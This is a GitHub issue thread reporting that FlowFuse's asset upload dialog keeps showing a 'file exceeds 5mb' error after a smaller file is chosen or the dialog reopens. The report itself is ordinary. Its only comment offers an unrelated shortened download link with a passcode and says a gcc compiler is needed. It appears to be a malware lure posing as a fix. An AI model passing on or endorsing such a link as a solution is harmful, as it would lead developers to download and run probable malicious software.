### ISSUE TITLE
Assets - "file exceeds 5mb" always visible after large file upload attempted

### ISSUE THREAD

**Issue by Steve-Mcl** [FlowFuse/flowfuse#4458]
### Current Behavior

Attempting to upload file > limit causes the upload dialog to display a validation error however it is never cleared.
![image](https://github.com/user-attachments/assets/31cb32c4-84c8-454b-ae4d-248608b495ed)

### Expected Behavior

should be cleared before form is displayed AND when a different (smaller) file is selected

### Steps To Reproduce

chose 10mb file and attempt upload
chose file smaller than 1mb - warning still visible
close and reopen - warning still visible

### Environment

- FlowFuse version: 2.8 (prod)
- Node.js version:
- npm version:
- Platform/OS:
- Browser: chrome

### Have you provided an initial effort estimate for this issue?

I have provided an initial effort estimate

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
